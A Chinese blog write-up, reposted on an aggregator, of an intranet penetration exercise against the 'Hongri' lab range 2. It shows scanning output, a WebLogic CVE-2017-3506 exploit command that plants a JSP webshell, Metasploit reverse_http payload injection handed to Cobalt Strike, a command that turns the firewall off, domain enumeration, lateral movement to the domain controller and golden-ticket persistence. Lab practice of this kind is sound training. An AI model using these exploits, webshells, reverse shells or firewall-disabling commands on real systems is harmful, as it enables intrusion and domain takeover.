内网渗透——红日靶场二

news2025/4/3 6:10:20

目录

一、前期准备

DC机配置

PC机配置

WEB机配置

将PC机和WEB机的IP地址进行更改

 开启WEB服务

二、外网探测

1.使用nmap扫描

2.目录扫描

3.漏洞扫描

(1)CVE-2017-3506(getshell失败)

(2)CVE-2017-2725(msf)

三、内网渗透

1.信息收集

(1)关闭防火墙

(2)查看域信息

(3)查看域内IP

(4)定位域控及域管理员

 (5)查看域内主机

2.权限提升

 3.横向移动

4.权限维持

四、总结


一、前期准备

首先下好三个虚拟机

 然后配置一下网络,先添加一个VMnet2

然后给每个虚拟机配置一下网卡

DC机配置

账号:administrator

密码:1qaz@WSX

PC机配置

需要配置两张网卡,分别是NAT模式和内网域环境的仅主机模式

账号:mssql

密码:1qaz@WSX

WEB机配置

同样也是配置两张网卡

账号:Administrator/de1ay(在前期配置过程中可以用DE1AY/Administrator进行登录)

密码:1qaz@WSX

将PC机和WEB机的IP地址进行更改

由于我们的VMnet8(NAT)是192.168.57.x 网段的,而这两个机器的默认IP地址为192.168.111.x

所以这里将这两台机器的IP地址改一下:

两者进行IPV4的更改时,都需要输入管理员账号密码

账号:administrator

密码:1qaz@WSX

现在,几台机器的配置如下:

kali:192.168.57.128

PC:192.168.57.201    10.10.10.201

WEB:192.168.57.80   10.10.10.80

DC:10.10.10.10

 开启WEB服务

进入WEB机中

分别以管理员身份进行运行上面三个程序

二、外网探测

1.使用nmap扫描

┌──(root㉿kali)-[~]
└─# arp-scan -l
Interface: eth0, type: EN10MB, MAC: 00:0c:29:ce:f6:bc, IPv4: 192.168.57.128
Starting arp-scan 1.10.0 with 256 hosts (https://github.com/royhills/arp-scan)
192.168.57.1    00:50:56:c0:00:08       VMware, Inc.
192.168.57.2    00:50:56:ea:ad:e3       VMware, Inc.
192.168.57.80   00:0c:29:d6:09:a8       VMware, Inc.
192.168.57.201  00:0c:29:96:f1:a1       VMware, Inc.
192.168.57.254  00:50:56:e3:9e:a6       VMware, Inc.

┌──(root㉿kali)-[~]
└─# nmap -sV -p- 192.168.57.80
Starting Nmap 7.95 ( https://nmap.org ) at 2025-03-27 19:57 CST
Nmap scan report for 192.168.57.80
Host is up (0.00046s latency).
Not shown: 65522 filtered tcp ports (no-response)
PORT      STATE SERVICE       VERSION
80/tcp    open  http          Microsoft IIS httpd 7.5
135/tcp   open  msrpc         Microsoft Windows RPC
139/tcp   open  netbios-ssn   Microsoft Windows netbios-ssn
445/tcp   open  microsoft-ds  Microsoft Windows Server 2008 R2 - 2012 microsoft-ds
1433/tcp  open  ms-sql-s      Microsoft SQL Server 2008 R2 10.50.4000; SP2
3389/tcp  open  ms-wbt-server Microsoft Terminal Service
7001/tcp  open  http          Oracle WebLogic Server 10.3.6.0 (Servlet 2.5; JSP 2.1; T3 enabled)
49152/tcp open  msrpc         Microsoft Windows RPC
49153/tcp open  msrpc         Microsoft Windows RPC
49154/tcp open  msrpc         Microsoft Windows RPC
49183/tcp open  msrpc         Microsoft Windows RPC
49190/tcp open  msrpc         Microsoft Windows RPC
60966/tcp open  ms-sql-s      Microsoft SQL Server 2008 R2 10.50.4000; SP2

发现80端口和7001端口都是http服务,尝试访问一下,发现80端口没什么反应,反倒是7001端口有信息:显示有Weblogic Server 10.3.6.0

2.目录扫描

扫描一下该端口的目录,看看会不会有别的接口信息,使用dirmap进行扫描

成功显示页面

 这个时候可以看到一些信息了:Weblogic是Oracle的JAVA应用服务器,所以这里应该是Weblogic服务。尝试在百度上搜索其相关的漏洞利用工具

我更喜欢用类似WPScan那样的专门的扫描工具,发现了WeblogicScan,尝试用该工具进行扫描,在扫描的同时也可以去尝试会不会有默认账号密码

不过貌似还是密码被改掉了吗,再看看WeblogicScan的扫描结果

3.漏洞扫描

发现还是扫描到了两个漏洞的,问了下关于这两个漏洞的介绍,发现都是远程执行漏洞,那就一个个复现试试。(后续漏洞的原理肯定会再了解的,听说Weblogic的漏洞很多,很有学习的必要,到时候应该会一个个搭建复现一下,这里就直接利用了)

(1)CVE-2017-3506(getshell失败)

以下漏洞复现过程主要是采取这位师傅的文章:
weblogic wls-wsat组件gesilaVE-2017-3506)-CSDN博客

访问/wls-wsat/CoordinatorPortType11目录

如果出现这个页面的话,说明漏洞很可能存在,现在下载工具

工具地址:https://github.com/Al1ex/CVE-2017-3506

写入木马文件:

┌──(root㉿kali)-[~/POC/Weblogic/CVE-2017-3506-main]
└─# java -jar WebLogic-XMLDecoder.jar -s http://192.168.57.80:7001/ /wls-wsat/CoordinatorPortType11 shell.jsp
[+] Success
[+] http://192.168.57.80:7001//wls-wsat/shell.jsp?password=secfree&command=whoami

 发现命令执行成功!但后面再尝试使用蚁剑连接时发现返回数据为空:

(2)CVE-2017-2725(msf)

搜索相关漏洞

配置攻击载荷

开始攻击

执行成功!

先让msf和cs联动一下,我更喜欢使用cs来进行操作

首先在cs上开启监听器

 然后在msf上设置shell转发

msf6 exploit(windows/local/payload_inject) > use exploit/windows/local/payload_inject
[*] Using configured payload windows/meterpreter/reverse_tcp
msf6 exploit(windows/local/payload_inject) > set payload windows/meterpreter/reverse_http
payload => windows/meterpreter/reverse_http
msf6 exploit(windows/local/payload_inject) > set prependmigrate true
prependmigrate => true
msf6 exploit(windows/local/payload_inject) > set DisablePayloadHandler true
DisablePayloadHandler => true
msf6 exploit(windows/local/payload_inject) > set lhost 192.168.57.128
lhost => 192.168.57.128
msf6 exploit(windows/local/payload_inject) > set lport 80
lport => 80
msf6 exploit(windows/local/payload_inject) > set session 1
session => 1
msf6 exploit(windows/local/payload_inject) > run

成功上线!

三、内网渗透

1.信息收集

(1)关闭防火墙

netsh advfirewall set allprofiles state off

(2)查看域信息

得到域名信息: de1ay.com 

而且可以得知该域应该是存在两个网段的,一个是 192.168.57.x 一个是10.10.10.x

(3)查看域内IP

arp -a

发现以下有用的IP地址:

192.168.57.201

10.10.10.10 (内网)

10.10.10.201 (内网)

(4)定位域控及域管理员

首先查看域控的主机名

beacon > shell net group "domain controllers" /domain

得到域控的主机名为DC,然后ping一下主机名来定位域控

发现域控是 10.10.10.10

还可以查看一下域管理员的名字:

beacon> net group "domain admins" /domain 

(5)查看域内主机

上面得到的IP还有一个是 10.10.10.201 不妨看一下其对应的主机名是什么

beacon> shell net group "domain computers" /domain

得到域内信息:
PC :10.10.10.201

DC:10.10.10.10 Adminstrator

2.权限提升

将WEB机的权限提升到SYSTEM,直接尝试权限提升就行

 3.横向移动

通过提权的SYSTEM对10.10.10.x/24这个网段进行扫描(内网主机存活+端口扫描)

PC机:

DC机:

可以看到PC机和DC机都开了3389端口,尝试远程桌面登录(但都没有成功)

发现三台机子都开了445端口,在抓取了哈希之后尝试横向移动,先建立一个SMB监听

然后尝试横向移动到DC域控主机上

横向成功!

4.权限维持

创建黄金票据

其中的Domian SID可以这样获得:
 

这样就成功实现权限维持了!

四、总结

相较于第一次打红日靶场来说,感觉已经熟练了不少,之前的知识补充还是很有用的,虽然也许还存在一些问题,但慢慢来会让自己好受不少。写的部分还是有一些欠佳,而且今天在看之前写的文章的时候竟然发现有几篇文章被系统设为 V I P 可见了,真真是对不起给予我帮助的师傅们。

有问题的地方,还请各位斧正,希望能给我一些宝贵的意见!

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.coloradmin.cn/o/2326355.html

如若内容造成侵权/违法违规/事实不符,请联系多彩编程网进行投诉反馈,一经查实,立即删除!

相关文章

【Unity】处理文字显示不全的问题

1.选中字体文件,检查 MultiAtlasTeextures 是否勾选,未勾选的话,先勾选保存后查看是否显示正常 2.勾选后未正常显示,则在搜索框中输入未显示的文本,确认字体图集是否包含该文本,然后点击Update Atlas Textu…

汽车诊断开发入门以及OBD检测

一、OBD 概述 定义:OBD 即 On - Board Diagnostics,车载自动诊断系统。它能实时监测车辆各项系统和部件状态,以此帮助诊断故障并预警。设计初衷与发展:最初设计目的是控制汽车尾气排放,确保符合环境标准。随着技术进步…

Ingredient-oriented Multi-Degradation Learning for Image Restoration论文阅读

摘要:重点在于关联多个任务本质的联系。 不同恢复任务的关联性很重要。 揭示退化现象的内在机理联系很有意义。 多合一的方法能在单一模型中处理多种退化问题,可扩展性较差。 成分导向范式挖掘不同图像退化现象背后的物理规律或特征模式。 成分导向退化重…

java项目挂机自动重启操作指南

前段时间有个伙伴问我,java项目挂机怎么自动重启。。。。。。今天就写一个 .sh脚本来实现应用挂机的自动重启功能 #!/bin/bash # 查询mita的进程个数 countps -ef | grep mita.jar | grep -v "grep" | wc -l # echo $count nowtimedate "%Y-%m-%d %H…

Vue el-table-column内el-tooltip识别换行符 \n

结构&#xff1a; <el-table-column prop"callSummary" width"300" label"摘要"><template slot-scope"scope"><el-tooltip class"item" effect"dark" placement"top"><div v-ht…

【C++指南】一文总结C++二叉搜索树

&#x1f31f; 各位看官好&#xff0c;我是egoist2023&#xff01; &#x1f30d; 种一棵树最好是十年前&#xff0c;其次是现在&#xff01; &#x1f680; 今天来学习C二叉搜索树的实现。 &#x1f44d; 如果觉得这篇文章有帮助&#xff0c;欢迎您一键三连&#xff0c;分享给…

【报告】内镜视频图像分析Foundation Model

来源&#xff1a;医疗基础模型 仅供个人学习&#xff0c;侵权请联系我删除

使用HTML5和CSS3实现炫酷的3D立方体动画

使用HTML5和CSS3实现炫酷的3D立方体动画 项目介绍 本文将详细介绍如何使用HTML5和CSS3技术实现一个交互式3D立方体动画。这个项目不仅展示了现代Web前端技术的强大功能&#xff0c;还能帮助读者深入理解CSS3的3D变换和动画特性。 技术栈 HTML5CSS3 (transform-style, persp…

MySQL数据库和表的操作之SQL语句

&#x1f3af; 本文专栏&#xff1a;MySQL深入浅出 &#x1f680; 作者主页&#xff1a;小度爱学习 MySQL数据库和表的操作 关系型数据库&#xff0c;都是遵循SQL语法进行数据查询和管理的。 SQL语句 什么是sql SQL&#xff1a;结构化查询语言(Structured Query Language)&…

多模态大语言模型arxiv论文略读(二)

Identifying the Correlation Between Language Distance and Cross-Lingual Transfer in a Multilingual Representation Space ➡️ 论文标题&#xff1a;Identifying the Correlation Between Language Distance and Cross-Lingual Transfer in a Multilingual Representat…

全局曝光与卷帘曝光

文章目录 曝光方式优点缺点应用场景 为何全局曝光帧率比卷帘曝光方式低 卷帘曝光和全局曝光是CMOS传感器两种常见的曝光模式&#xff0c;以下是二者的对比&#xff1a; 参考&#xff1a;B站优致谱视觉 曝光方式 卷帘曝光&#xff1a;传感器的每一行像素按顺序逐行扫描曝光&…

【一起来学kubernetes】31、Helm使用详解

一、Helm 简介 Helm 是 Kubernetes 的包管理工具&#xff0c;类比 Linux 中的 yum 或 apt&#xff0c;用于简化应用的打包、部署和版本管理。其核心功能包括&#xff1a; Chart 管理&#xff1a;将 Kubernetes 资源&#xff08;Deployment、Service 等&#xff09;打包为可复…

python 常用的6个爬虫第三方库

Python中有非常多用于网络数据采集的库&#xff0c;功能非常强大&#xff0c;有的用于抓取网页&#xff0c;有的用于解析网页&#xff0c;这里介绍6个最常用的库。 1. BeautifulSoup BeautifulSoup是最常用的Python网页解析库之一&#xff0c;可将 HTML 和 XML 文档解析为树形…

blender场景导入Unity的流程(个人总结)

处理找不到贴图的问题 blender场景导入Unity遇到的主要问题是贴图找不到。经研究是blender里材质的着色器结构不是贴图-原理化BSDF-输出导致的。目前还没有自动解决方法&#xff0c;总结了一个效率还可以的手动解决流程。 打开后到材质预览&#xff0c;看一下显示没问题&…

可编辑36页PPT | “新基建”在数字化智慧高速公路中的支撑应用方案智慧高速解决方案智慧交通方案

这份文档是一份关于“新基建”在数字化智慧高速公路中支撑应用方案的PPT内容介绍&#xff0c;它详细阐述了新基建在智慧高速建设中的背景、总体要求和建设内容。从政策背景来看&#xff0c;多个政府部门发布了相关政策文件&#xff0c;推动交通运输基础设施的数字化升级和智慧交…

一文解读DeepSeek在保险业的应用

引言 随着人工智能技术的深度渗透&#xff0c;保险行业正经历从传统经验驱动向数据智能驱动的转型。作为国产高性能开源大模型的代表&#xff0c;DeepSeek 凭借其低成本、高推理效率及跨模态处理能力&#xff0c;已成为保险机构突破服务瓶颈、重构业务逻辑的核心工具。截止目前…

物联网时代,HMI 设计的创新机遇与挑战

随着物联网&#xff08;IoT&#xff09;技术的蓬勃发展&#xff0c;各种智能设备如雨后春笋般涌现&#xff0c;从智能家居到智慧城市&#xff0c;物联网的应用场景愈发广泛。作为人与设备之间的桥梁&#xff0c;人机界面&#xff08;HMI&#xff09;设计在物联网时代扮演着至关…

【区块链安全 | 第二十四篇】单位和全局可用变量(二)

文章目录 单位和全局可用变量&#xff08;Units and Globally Available Variables&#xff09;特殊变量和函数1. 区块和交易属性2. ABI 编码和解码函数3. bytes 成员函数4. string 成员函数5. 错误处理6. 数学和加密函数7. 地址类型成员函数8. 与合约相关9. 类型信息 单位和全…

C语言:指针数组、函数、二级指针

1.指针数组 指针数组是一个数组&#xff0c;数组中的每个元素都是指针。这些指针可以指向各种类型的数据&#xff0c;如整数、字符、结构体等&#xff0c;甚至可以指向其他数组或函数。 指针数组的声明格式通常为&#xff1a; 数据类型 *数组名[数组大小];其中&#xff0c;数…

批量修改记事本文本文件编码,可以解决文本文件乱码问题

对于文本文件来说&#xff0c;通常都可以设置不同的编码格式&#xff0c;每一种不同的编码格式支持的字符都可能是不一样的。因此当编码格式出现错误的时候&#xff0c;文本文件可能会出现乱码的问题。如何将文本文件的编码由一种格式变为另外一种格式呢&#xff1f;如果文件出…